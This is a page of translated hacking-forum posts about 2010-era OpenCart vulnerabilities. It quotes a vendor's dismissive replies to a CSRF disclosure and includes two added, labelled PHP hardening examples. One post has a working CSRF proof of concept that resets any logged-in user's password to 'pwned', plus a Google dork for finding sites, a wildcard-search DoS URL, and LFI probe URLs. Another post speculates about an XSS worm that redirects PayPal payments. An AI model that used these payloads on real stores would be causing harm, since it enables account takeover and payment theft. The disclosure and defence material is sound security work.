Messages - WHK

#3161
I think it's better to create threads than to spawn new processes; they would start in much less time and use less memory.
#3162
Why don't you use PayPal and let them do the conversion automatically when you pay?
#3163
Could you sort out your differences in private?
#3164
There is code execution and it's possible to upload a shell to the official demo; later on we'll do an audit on it similar to simpleaudit.
Anyone who wants to join, please say so here so we can add you to the project on Google Code.
#3165
When the post drops down in position I'll move it to the web section.
#3166
It's already been fixed and they have LFI, path disclosure and file disclosure looooool

Quote: Fatal error: Class 'Controllerdownloaddownloadphp' not found in /home/opencart/public_html/opencart/system/engine/front.php  on line 44

http://www.opencart.com/opencart/system/logs/error.txt

It can also be DoSed through memory exhaustion, using up the MySQL server's resources with a %%% attack
http://demo.opencart.com/index.php?route=product/search&keyword=%25&category_id=0

You can see straight away that its query is of the type like '%$val%', so if we insert a % it ends up as a nice like '%%%', generating a select * with no limit lol

And well...
Quote: http://demo.opencart.com/index.php?route=module/cart/callback

POST /index.php?route=module/cart/callback HTTP/1.1
Host: demo.opencart.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.5pre) Gecko/20100514 Ubuntu/9.10 (karmic) Namoroka/3.6.5pre
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://demo.opencart.com/index.php?route=product/product&product_id=47
Content-Length: 122
Cookie: PHPSESSID=a239eb01c20087fdf8a19ec49929de66; language=en; currency=GBP
Pragma: no-cache
Cache-Control: no-cache

quantity=1&product_id=47&redirect=http%3A%2F%2Fdemo.opencart.com%2Findex.php%3Froute%3Dproduct%2Fproduct%26product_id%3D47

Practically the whole system has CSRF x_x

Code (html4strict):
<html>
<body onload="document.forms[0].submit();">
<!--
Basic arbitrary password change in OpenCart <= 1.4.8
GoogleDork: "Powered by OpenCart"
Disclosure: http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
PoC: https://foro.elhacker.net/noticias/opencart_se_niega_a_arreglar_vulnerabilidades_y_sabotea_los_parches-t294544.0.html
Change password of any user to "pwned"
-->
<form method="post" action="http://demo.opencart.com/index.php?route=account/password">
<input type="hidden" name="password" value="pwned" />
<input type="hidden" name="confirm" value="pwned" />
</form>
</body>
</html>

lol, what is this?
http://www.opencart.com/index.php?route=documentation/documentation&path=\

Besides, a file containing PHP code, and even less a theme, should never be viewable directly
http://www.opencart.com/opencart/application/view/template/documentation/documentation.tpl

What if I include some critical variable in it, like some kind of connection to some data source x?

It also can't tell the difference between a string and an array lol
http://www.opencart.com/index.php?route[]=demonstration/demonstration
Quote: Notice: Array to string conversion in /home/opencart/public_html/opencart/system/engine/action.php  on line 10

What else could I find if I had the source code?
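As an added defensive example (not OpenCart's code, and not from the post above), this is how a PHP keyword search can be hardened against the bare-wildcard case described in the post: a keyword consisting only of `%` or `_` is refused before any query runs, wildcard characters inside real keywords are escaped so they match literally, the query goes through a prepared statement, and the result set is capped. The table and column names, the minimum length and the result cap are assumptions chosen for the illustration.

```php
<?php
// Added example, not OpenCart's code. Hardens a "LIKE '%$val%'" keyword
// search so that a keyword made only of wildcards is rejected before it
// reaches MySQL, and so that % and _ in user input are matched literally.
// Table and column names below are assumptions for illustration.

const MIN_KEYWORD_LENGTH = 3;   // constructed policy value
const MAX_RESULTS        = 100; // constructed policy value
const LIKE_ESCAPE_CHAR   = '!'; // any single character not expected in keywords

// Escape LIKE metacharacters so they are matched literally. The ESCAPE
// clause in the query tells MySQL which character was used.
function escapeLikeWildcards(string $value): string
{
    $e = LIKE_ESCAPE_CHAR;
    return str_replace([$e, '%', '_'], [$e . $e, $e . '%', $e . '_'], $value);
}

// Returns [sql, params] for a bounded search, or null if the keyword is
// rejected. "%%%" or "___" count as zero literal characters and are refused,
// so the unbounded "LIKE '%%%'" full-table pattern never reaches the server.
function buildSearchQuery(string $keyword): ?array
{
    $keyword = trim($keyword);
    $literal = str_replace(['%', '_'], '', $keyword);
    if (strlen($literal) < MIN_KEYWORD_LENGTH) {   // byte length is enough for a floor
        return null;
    }
    $pattern = '%' . escapeLikeWildcards($keyword) . '%';
    // LIMIT is a server-side constant, not user input, so it can be inlined.
    $sql = 'SELECT product_id, name FROM product_description'
         . ' WHERE name LIKE :pattern ESCAPE ' . "'" . LIKE_ESCAPE_CHAR . "'"
         . ' LIMIT ' . (int) MAX_RESULTS;
    return [$sql, [':pattern' => $pattern]];
}

// Executes the search with a prepared statement; empty array when rejected.
function searchProducts(PDO $db, string $keyword): array
{
    $built = buildSearchQuery($keyword);
    if ($built === null) {
        return [];
    }
    [$sql, $params] = $built;
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs showing what reaches the database and what does not.
if (PHP_SAPI === 'cli') {
    foreach (['%', '%%%', '_a_', 'shirt', '50% off'] as $kw) {
        $q = buildSearchQuery($kw);
        echo str_pad(var_export($kw, true), 12),
             $q === null ? "rejected\n" : 'pattern ' . $q[1][':pattern'] . "\n";
    }
}
```

Run from the command line the loop shows `'%'`, `'%%%'` and `'_a_'` rejected, while `'shirt'` becomes `%shirt%` and `'50% off'` becomes `%50!% off%`, i.e. the user's percent sign is now a literal character rather than a wildcard. The length check is applied to the keyword with wildcards removed on purpose: measuring the raw string would let `%%%` pass as three characters.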
#3167
Well, let's take advantage of the fact that both of them are DDoSed and turn to Google's cache xD

http://webcache.googleusercontent.com/search?q=cache:GxNTLYTONrsJ:blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/+opencart&cd=8&hl=es&ct=clnk&gl=cl

Quote: ————————————————–
    From: "Ben"
    Sent: Friday, January 22, 2010 8:06 PM
    To: < *******@opencart.com>
    Subject: OpenCart – Enquiry

    Hi,

    I recently installed OpenCart and I noticed that it is vulnerable to CSRF attacks. I have created a sample page that is capable of inserting a rogue user (the page currently prompts you but could be done silently if the attacker knows the url of the site).

    http://visionsource.org/*********.html

    Please let me know that you are looking into the security issue and are going to release an update with a fix otherwise I will make the issue public.

    If you need any help fixing the problem please let me know.

    Thanks,
    Ben.
    ————————————————–
    On 2010-01-22, at 4:50 PM, Daniel Kerr wrote:

    Ben you seem to be very clever to come up with this. But! you need to be logged in for this to happen.

    ————————————————–
    From: "Ben Maynard"
    Sent: Friday, January 22, 2010 11:34 PM
    To: "Daniel Kerr"
    Subject: Re: OpenCart – Enquiry

    Hi Daniel,

    That is the whole point of a CSRF attack. Please read http://en.wikipedia.org/wiki/Csrf for an explanation on the attack.

    This can be very dangerous, for example:

    I am an attacker looking at stealing money, I find websites that are running opencart and have paypal as a payment method. I send the owner an email asking a question about a product and send a link that will perform the attack on the website. The chances of the owner being logged into their opencart admin is high since they are dealing with orders, and a rogue account is created without the user knowing (The attacker could just format the malicious page to look like a 404 not found page so it doesn't raise suspicion with the owner).

    The attacker makes the script send an email when the page is hit, so he knows when to log into the admin section. The attacker then logs in, changes the paypal email address to his own account, deletes the new account to help cover his tracks. He starts to get the money from the website and the owner of the website may not realize what has happened for a couple of days (maybe even longer)!

    If someone was to do this, it would cause a major problem for the owner (and buyers whose money was stolen).

    I have implemented a fix on the website I am working on and don't mind sharing the fix. I create a random token when the user logs in, and in the Url class I add it to the url. There is also a check on the user auth.

    Thanks,
    Ben.
    ————————————————–
    On 2010-01-22, at 7:31 PM, Daniel Kerr wrote:

    This sort of thing is down to the client. The software on a clients computer is nothing to do with opencart! There is no way that I'm responsible for a client being stupid enough to click links in emails.

    Even professional banking sites have trouble with the problem you describe.

    The only thing a client can take steps to do is only allowing certain IP's to access the admin via their hosting.

    ————————————————–
    From: "Ben Maynard"
    Sent: Saturday, January 23, 2010 12:52 AM
    To: "Daniel Kerr"
    Subject: Re: OpenCart – Enquiry

    A link in an email is not the only way for this attack to be performed, it was just an example. It's not hard to add protection and would make OpenCart more secure, security is not something you can take lightly.

    ————————————————–
    On 2010-01-22, at 8:05 PM, Daniel Kerr wrote:
    what protection do you recommend?
    ————————————————–
    On 2010-01-22, at 8:05 PM, Daniel Kerr wrote:
    to be honest this again is down to the client. not opencart.

    the security problem is very low. seriously how is someone going to trick someone into clicking a link to a site that will then display their own web site admin?

    you're just wasting my time.

Quote: Daniel Kerr says:
February 2, 2010 at 3:39 am

The guy who sent me the email is an idiot. He seems to think he has found some great hack. The hack will not work unless the user is logged in and clicks a link that will redirect them to their own admin control panel.

Daniel Kerr says:
February 2, 2010 at 10:03 pm

There are many things a web store owner can do, such as rename their admin folder or restrict the IPs of who can login. But again this is down to the client to do.

Any good anti-virus would stop this sort of problem.

As for Ben's idea of adding tokens to the end of the URLs, well, I like the URLs like they are.
Daniel Kerr says:
February 2, 2010 at 10:14 pm

To be honest, this just shows the type of person he is. He thinks he's found some big hack and when I tell him to stop wasting my time he goes around posting my emails in forums and his blog. Ben is a prat.

This sort of problem even today affects big sites like Gmail, PayPal. You really think everything is down to the person who writes the script? Or the web user?

looooooooooool

There are geniuses out there developing software with a backdoor included, because that isn't a bug, it's a backdoor: when a developer builds software knowing the vulnerability in his system and does nothing about it, that's called a backdoor.

Now, depending on the CSRF, from what I'm reading it's possible to get into the admin panel and modify data such as payments.
And if an XSS could be found in the admin panel, a worm could easily be built through XSS, redirecting the victim to your own CSRF and mass-changing the payment emails to my PayPal account xDDDD

lol, I mean, no good payment system that I know of suffers from CSRF, which is such a basic programming flaw, even more basic than an XSS. Now, if the developer doesn't know what a CSRF is or how to fix it, then clearly this software must not be used under any circumstances.

What's more, given everything said and proven about their indifference to this security problem, they could easily be sued by any company that uses this software.
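The defence Ben describes in the quoted email (a random per-session token, added to the site's own URLs or forms and checked together with the user's authentication) is what stops the auto-submitting form in the post above. The following is an added example written for this page, not OpenCart's code and not Ben's: a PHP handler for a password-change route that refuses any POST not carrying the session's own token. The session array is passed in explicitly so the functions can be exercised from the command line; in a real application `$_SESSION` would be passed. The session key, field name and the `$store` callback are assumptions.

```php
<?php
// Added example, not OpenCart's code: the per-session token defence
// described in the quoted email, written for a PHP form handler such as a
// password-change route. The session is passed in explicitly so the
// functions can be exercised without a web server; in production pass $_SESSION.

const CSRF_SESSION_KEY = 'csrf_token'; // constructed key name
const CSRF_FIELD_NAME  = 'csrf_token'; // constructed field name

// Issues one random token per session, created once (e.g. at login) and
// reused for every form the session renders.
function csrfToken(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// Hidden input to embed in every state-changing form the site itself renders.
function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="' . CSRF_FIELD_NAME . '" value="' . $token . '" />';
}

// True only when the request is a POST from an authenticated session that
// carries that session's own token. A page on another origin can make the
// browser send the cookies, but it cannot read the token to include it.
function csrfRequestIsValid(string $method, array $post, array $session): bool
{
    if ($method !== 'POST' || empty($session['user_id'])) {
        return false;
    }
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $supplied = $post[CSRF_FIELD_NAME] ?? '';
    if ($expected === '' || !is_string($supplied)) {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Handler for the password-change route with the check in front of the write.
// $store(userId, passwordHash) is an assumed persistence callback.
function changePassword(string $method, array $post, array $session, callable $store): string
{
    if (!csrfRequestIsValid($method, $post, $session)) {
        return 'rejected: missing or invalid CSRF token';
    }
    $password = $post['password'] ?? '';
    if ($password === '' || $password !== ($post['confirm'] ?? null)) {
        return 'rejected: passwords do not match';
    }
    $store($session['user_id'], password_hash($password, PASSWORD_DEFAULT));
    return 'password changed';
}

if (PHP_SAPI === 'cli') {
    $session = ['user_id' => 42];                       // constructed logged-in session
    $store   = function (int $uid, string $hash): void {}; // no-op store for the demo

    // Cross-site form: rides on the victim's cookies but carries no token.
    $attack = ['password' => 'pwned', 'confirm' => 'pwned'];
    echo changePassword('POST', $attack, $session, $store), "\n";

    // Form rendered by the site itself, which embedded csrfField($session).
    $legit = $attack + [CSRF_FIELD_NAME => csrfToken($session)];
    echo changePassword('POST', $legit, $session, $store), "\n";
}
```

Run from the command line the first call prints `rejected: missing or invalid CSRF token` and the second prints `password changed`. Two details matter in practice: the token must be compared with `hash_equals` rather than `==`, and the check must run before any write, which is why the handler tests the token before it even looks at the password fields. Restricting the admin to certain IPs, as suggested in the quoted replies, does not help here, because the request comes from the logged-in owner's own browser.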
#3168
Your router does that.
#3169
Quote: What do we recommend? Not using OpenCart.
Writing exploits xDDDD

An antivirus doesn't protect against a CSRF attack.

PS: the blog doesn't work, the server isn't responding.
PS2: lol, now I realise they ended up DDoSing each other xD
#3170
Quote: And by the way, does anyone know anything about APB Basic? God, I've searched the whole internet for it and I can't find anything, absolutely nothing, it's as if it didn't exist. It's the program we use to program (pardon the redundancy) in the course I'm doing; I want it to practice; it's similar to the Windows console (cmd)
http://es.wikipedia.org/wiki/Lenguaje_de_programaci%C3%B3n_ABC

ABC programming is the language oriented to a structure with indentation and no braces, like for example Visual Basic, Python, Delphi, BASICs, etc.